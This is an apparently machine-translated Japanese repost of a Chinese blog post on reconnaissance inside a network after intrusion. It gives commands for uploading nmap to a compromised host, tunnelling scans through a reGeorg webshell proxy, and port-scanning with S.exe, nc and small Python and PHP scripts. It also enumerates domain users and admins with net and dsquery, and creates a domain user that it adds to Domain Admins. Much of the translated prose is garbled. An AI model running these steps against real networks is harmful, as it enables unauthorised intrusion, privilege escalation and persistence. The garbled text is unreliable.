ネットワークの侵入 - ネットワーク情報収集(ネットワーク領域内の収集情報を他のホスト、ポートスキャンといくつかの一般的なコマンドのドメイン)

ポートスキャン

nmapのは、ネットワークに入った後、外部のネットワークスキャン動作は、基本的には代わりの一連の同じ、ただ一つのIP IPアドレスであり、コマンドライン、コースのグラフィカルインターフェース、znmapに基づいて、クロスプラットフォームの情報収集ツールでありますスキャン

NAMP

1. nmapのは、ターゲットマシンに直接アップロード

どのように多くのホストオンラインネットワーク内の1.1スキャニング

nmap.exe -sP 内网地址段或单个ip

ネットワークアドレス:192.168.xxの172.16.xx -172.31.xx 10.xxx

マシンのスキャン2.オンラインポート

nmap.exe ip

2. Doがプロキシ経由でnmapのリモートアップロードを使用しません

1.アップロードregeorg DMZネットワークへ

2.エージェントがregeorgを介してネットワーク内のマシンをDMZ

python reGeorgSocksProxy.py -u (regeorg上传地址/tunnel.aspx)

3.変更/etc/proxychains.confプロフィール

socks5 127.0.0.1 8888

の形態の薬剤を用いて4 nmapのポート・スキャン

proxychains nmap -sT -Pn -p 80,445,3389 10.1.1.1

sのスキャナ

S.exe、このプログラムは、Windowsの下で、高速スキャナであります

1.まずS.exeアップロード

2.

2.1 TCPポートは、このセクションIP 218.80.12.123に218.80.12.1の80スキャン、最大512の同時スレッドであります

S.exe TCP 218.80.12.1 218.80.12.123 80 512

218.80.12.1 218.80.12.123のIPを、このポートのセクション21と5631スキャン2.2 TCPは、最大同時スレッドは512であり、ディスプレイバナー

S.exe TCP 218.80.12.1 218.80.12.123 21,5631 512 /Banner

2.3 TCPポートスキャン1-200 218.80.12.1このIPの218.80.12.12に、最大同時実行スレッド512

S.exe TCP 218.80.12.1 218.80.12.12 1-200 512

最大同時スレッドで218.80.12.7この1-200 IPポートをスキャン2.4 TCPは、結果がResult.txt Sがジャストスキャンに位置しており、お使いのスキャナの上のフォルダにスキャンした後、Result.txtを書かされ、512でありますその中のすべてのもの

S.exe TCP 218.80.12.7 1-200 512 /save


2.5 SYNは結果がResult.txtはそれでだけでスキャンすべてSはに位置しているスキャナ、上のフォルダにスキャンした後、Result.txt書き込まれ、この中に1〜65535のポート218.80.12.7 IPをスキャン

S.exe SYN 218.80.12.7 1-65535 /Save

この218.80.12.1 218.80.12.255のIPセグメントにおける2.6 SYNスキャンポート21は、結果がResult.txtに位置しているSスキャナ、単にスキャンすべてのフォルダにあるスキャンした後、Result.tx書かれています内側に

S.exe SYN 218.80.12.1 218.80.12.255 21 /Save

NC

NCネットワークがスキャンポートに使用することができますツールです。

使用します。

80から445 IPポートのスキャン

nc -nvv -w2 -z ip 80-445

スクリプトを記述するので、

PHP、PythonやPerlの、ルビー、ジャワ、Cおよび他のプログラムがポートスキャンを行うために使用することができますが、また、スキャンを実行するためにバットやシェルスクリプトを使用することができます

パイソン

#!/usr/bin/env python
 
import socket
 
def get_ip_status(ip,port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.connect((ip,port))
        print('{0} port {1} is open'.format(ip, port))
    except Exception as err:
        print('{0} port {1} is not open'.format(ip,port))
    finally:
        server.close()
 
if __name__ == '__main__':
    host = '10.0.0.11'
    for port in range(20,100):
        get_ip_status(host,port)

PHP

$arr = [80,8080,3306];
foreach ($arr as $port) {
    $fp = @fsockopen('172.29.159.198',$port,$errno,$errstr,0.1);
    if (!$fp) {
        echo $port." closed\n";
    }else{
        echo $port." Opend\n";
    }
}

一般的な情報収集コマンド

1.現在のグループのコンピュータ名の取得
、使用条件を:サーバーおよびコンピュータブラウザサービスがオンになっています

net view

現在のすべてのドメインを取得します。2.

net view /domain

ワークグループ内のワークグループのコンピュータの一覧を取得します3。

net view /domain:hacker

コンピュータの名に対応するIPアドレスを取得します。4.

ping -n 1 -4 dc


 コンピュータは多くの時間に名前を付ける場合は、バットバッチのping IPアクセスを使用することができます

@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO (
@FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO (
@FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k  %%j)
)
)

それらは、ドメインコントローラのクエリに送信されると、以下のコマンドを実行し、マシンの浸透がドメインのユーザー権限ではない場合、それはエラーになります

ユーザーのドメインを確認してください。5.

dsquery user  或者  net user /domain


Domain Usersグループをチェック6.

net group /domain

7.クエリのドメイン管理者

net group "Domain Admins" /domain

他のドメイングループの内容を表示するには、別のドメイン名で管理者グループを交換してください

ドメインユーザーを追加します。8.
一般的なドメインユーザーを追加します

net user lp 123.com /add /domain

ドメイン管理者に通常のドメインユーザー

net group "Domain Admins" lp /add /domain

ビューのユーザー情報      

net user lp /domain

9.現在のコンピュータ名、フルネーム、ユーザ名、システムバージョン、ワークステーションフィールド、着陸場

net config workstation

10.クエリのすべてのコンピュータ名

dsquery computer
net group "Domain Computers" /domain
net group "Domain Controllers" /domain

11.netコマンドは、
ローカルディスク(高い特権ユーザ)にマッピング

net use z: \\计算机名或者ip\盘符或者分区

共有ビュー(以下$の隠し共有を参照してください)

net view \\ip


(d)に、アプリの$という共有を開きます。\設定

net share app$=d:\config

12.トレースルート

tracert 公网dns地址

13.位置決め制御ドメイン
名は、タイムドメインとドメインサーバを参照してください

net time /domain


クエリドメインコントローラ

net group "Domain Controllers" /domain


IPCONFIGで構成されたDNSアドレスを探します

ipconfig /all    拿到dns地址
ping -a dns地址  返回计算机名

14.dsqueryいくつかの使用
すべてのマシンのドメイン名のリストへ

dsquery computer domain root -limit 65535 && net group "domain computers" /domain

 ドメイン名内のすべてのユーザーを一覧表示

dsquery user domain root -limit 65535 && net user /domain

ネットワークセグメンテーションは、ドメインをリストされています

dsquery subnet

グループは、ドメインにリストされています

dsquery group && net group /domain

リストドメイン内の組織単位

dsquery ou

ドメインのドメイン制御サーバをリスト

dsquery server && net time /domain

上場ドメイン管理アカウント

net group "domain admins" /domain

 

公開された66元の記事 ウォンの賞賛234 ・は 30000 +を見て

おすすめ

転載: blog.csdn.net/wsnbbz/article/details/105102077